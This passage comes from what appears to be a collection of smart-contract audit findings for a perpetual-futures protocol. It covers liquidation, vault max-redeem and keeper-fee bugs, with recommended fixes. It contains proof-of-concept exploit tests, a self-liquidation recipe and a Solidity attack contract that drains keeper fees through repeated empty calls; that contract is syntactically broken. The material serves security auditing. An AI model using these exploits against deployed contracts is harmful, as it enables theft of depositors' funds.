position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are 
skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). 
`closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent 
= await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(\"Before liquidation. Latest= \" + posLatest.long + \" current = \" + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(\"After liquidation. Latest= \" + posLatest.long + \" current = \" + posCurrent.long);\\n\\n})\\n```\\nчWhen liquidating, order must decrease position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\nчMalicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. 
For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.ч```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n -Vault leverage can be increased to any value up to min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`чhighчWhen redeeming from the vault, maximum amount allowed to be redeemed is limited by collateral required to keep the minimum vault position size which will remain open due to different factors, including `closable` 
value, which is a limitation on how much position can be closed given current pending positions. However, when calclulating max redeemable amount, `closable` value is multiplied by `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow to withdraw a bit more collateral so that leverage can increase at max by LEVERAGE_BUFFER. However, the math is totally wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so position will remain at 12-10 = 2\\nOnce settled, user can claim all vault collateral while vault still has position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if remaining collateral is equal to or is greater than total margin of all markets. This means that user can put the vault into max leverage possible ignoring the vault leverage config (vault will have open position of such size, which will make all vault collateral equal the minimum margin requirement to open such position). 
This creates a big risk for vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if user redeems amount higher than `closable` allows (redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such situation (redeemable amount > closable). There is still a way to create such situation indirectly via maker limit limitation.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in underlying market are worth $4K\\nOpen maker position in underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open position of size = $48K (+$44K), however `makerLimit` will not allow to open full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose maker position in underlying markets to free up maker limit\\nDeposit minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible, because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position will be limited by `closable`, so it will be reduced only by $40K (set to $8K).\\nWait until redeem settles\\nClaim $11K from the vault. 
This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log(\"start\");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = 
(await market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log(\"Vault collateral = \" + vaultCollateral.div(1e6) + \" pos = \" + vaultPos.div(1e12) + \" leverage = \" + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(\"ETH Limit = \" + makerLimit + \" CurrentGlobal = \" + makerCurrent + \" CurrentUser = \" + makerBefore + \" price = \" + ethPrice + \" availToken = \" + availToken + \" maker = \" + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = 
parse6decimal('8000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(\"BTC Limit = \" + makerLimit + \" CurrentGlobal = \" + makerCurrent + \" CurrentUser = \" + makerBeforeBtc + \" price = \" + btcPrice + \" availToken = \" + availToken + \" maker = \" + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log(\"market updated\");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log(\"reduce maker blocking position to allow vault maker increase\")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log(\"Deposit small amount to increase position\")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log(\"Redeeming 11500\")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n 
console.log(\"Claiming 11100\")\\n await vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\nчThe formula to allow LEVERAGE_BUFFER should apply it to final position size, not to delta position size (maxRedeem returns delta to subtract from current position). Currently redeem amount it limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense, it certainly doesn't limit new leverage factor to LEVERAGE_BUFFER (denominator can be 0, negative or any small value, meaning leverage can be any number as high as you want). 
I think what developers wanted, is to have:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate delta collateral simply from delta position like it is now. When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\nчMalicious user can put the vault at very high leverage, breaking important protocol invariant (leverage not exceeding target market leverage) and exposing the users to much higher potential funds loss / risk from the price movement due to high leverage and very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.ч```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) 
// available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n -Vault max redeem calculations limit redeem amount to the smallest position size in underlying markets which can lead to very small max redeem amount even with huge TVL vaultчhighчWhen redeeming from the vault, maximum amount allowed to be redeemed is limited by current opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to maker limit, the vault will open very small position, limited by maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) position in such market, so there is no sense in limiting redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. For example, if the user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nVault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. 
As can be seen from the calculation, redeem amount is limited by vault's position in the market. However, if the position is far from target due to different market limitations, this doesn't make much sense. For example, if vault has $2M deposts and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 vault position is worth $1 (target position = $1M)\\nIn Market2 vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase position in Market1 rather than decrease.\\nThere is also an opposite situation possible, when current position is higher than target position (due to LEVERAGE_BUFFER). This will make maxredeem too high. For example, similar example to previous, but:\\nIn Market1 vault position is worth $1.2M (target position = $1M)\\nIn Market2 vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.чConsider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral instead of using only current position for calculations. This might be somewhat complex, because it will require to re-calculate allocation amounts to compare target vs current position. 
Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end)чWhen vault's position is small in any underlying market due to maker limit, the max redeem amount in the vault will be very small, which will force users with large deposits to use a lot of transactions to redeem it (they'll lose funds to gas) or it might even be next to impossible to do at all (if, for example, user has a deposit of $10M and max redeem = $1), in such case the redeems are basically broken and not possible to do.ч```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n -Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper feesчhighчAnyone can call `KeeperFactory#request`, inputting empty arrays as parameters, and the call will succeed, and the caller receives a fee.\\nAttacker can perform this attack many times within a loop to steal ALL keeper fees from protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper(i.e. caller) a fee.\\n`KeeperFactory#settle` call will fail if there is no account to settle(i.e. 
if callback array is empty)\\nAfter settleing an account, it gets removed from the callback array\\nThe issue:\\nHere is KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, \"\")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, function does not check if the length of the array is 0, so if user inputs empty array, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAttacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket(\\n function update()external;\\n)\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,\"not allowed\");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids=[];\\n IMarket[] memory markets=[];\\n uint256[] versions=[];\\n uint256[] maxCounts=[];\\n\\n // perform attack in a loop till all funds are drained or call reverts\\n while(canSteal){\\n try 
IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\nчWithin KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, \"\") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\nчAll keeper fees can be stolen from protocol, and there will be no way to incentivize Keepers to commitRequested oracle version, and other keeper tasksч```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, \"\")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n -MultiInvoker doesn't pay keepers refund for l1 calldataчmediumчMultiInvoker doesn't pay keepers refund for l1 calldata, as result keepers can be not incentivized to execute orders.\\nMultiInvoker contract allows users to create orders, which then can be executed by keepers. 
For his job, keeper receives fee from order's creator. This fee payment is handled by `_handleKeep` function.\\nThe function will call `keep` modifier and will craft `KeepConfig` which contains `keepBufferCalldata`, which is flat fee for l1 calldata of this call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier should calculate amount of tokens that should be refunded to user and then raise it. We are interested not in whole modifier, but in calldata handling. To do that we call `_calldataFee` function. This function does nothing in the `Kept` contract and is overrided in the `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that MultiInvoker is only one and it just extends `Keept`. 
As result his `_calldataFee` function will always return 0, which means that calldata fee will not be added to the refund of keeper.чYou need to implement 2 versions of MultiInvoker: for optimism(Kept_Optimism) and arbitrum(Kept_Arbitrum).чKeeper will not be incentivized to execute orders.ч```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n -It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no costчmediumчIn 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. 
So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 1 transaction do the following: 3.1. Reduce your position by `(margin / maintenance)` and make the position you want to liquidate at exactly the edge of liquidation: withdraw maximum allowed amount. Position reduction makes margined(current position) = maintained(settled position), so it's possible to withdraw up to be at the edge of liquidation. 3.2. Commit non-requested oracle version with the price recorded earlier (this price makes the position liquidatable) 3.3. 
Liquidate your position (it will be allowed, because the position generates a minimum loss due to price change and becomes liquidatable)\\nSince all liquidation fee is given to user himself, liquidation of own position is almost free for the user (only the keeper and position open/close fee is paid if any).чIf collateral is withdrawn or order increases position, verify `maxPendingMagnitude` with `margined` amount. If position is reduced or remains unchanged AND collateral is not withdrawn, only then `maxPendingMagnitude` can be verified with `maintained` amount.чThere are different malicious actions scenarios possible which can abuse this issue and overcome efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine with the other issues for more severe effect to be able to abuse them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing to max position size of 2^62-1 - all in 1 transaction)\\nOpen large maker and long or short position, then liquidate maker to cause mismatch between long/short and maker (socialize positions). 
This will cause some chaos in the market, disbalance between long and short profit/loss and users will probably start leaving such chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from competition.\\nOpen large maker, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high and remaining small maker position will be able to accumulate big profit with a small risk.ч```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n -Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contractчmediumчWhen invalid oracle version happens, positions pending at the oracle version are invalidated with the following pending positions increasing or decreasing in size. When this happens, all position limit checks are not applied (and can't be cancelled/modified), but they are still verified for the final positions in _invariant. This means that many checks are bypassed during such event. There is a protection against underflow due to this problem by enforcing the calculated `closable` value to be 0 or higher. However, exactly the same problem can happen with overflow and there is no protection against it.\\nFor example:\\nLatest global maker = 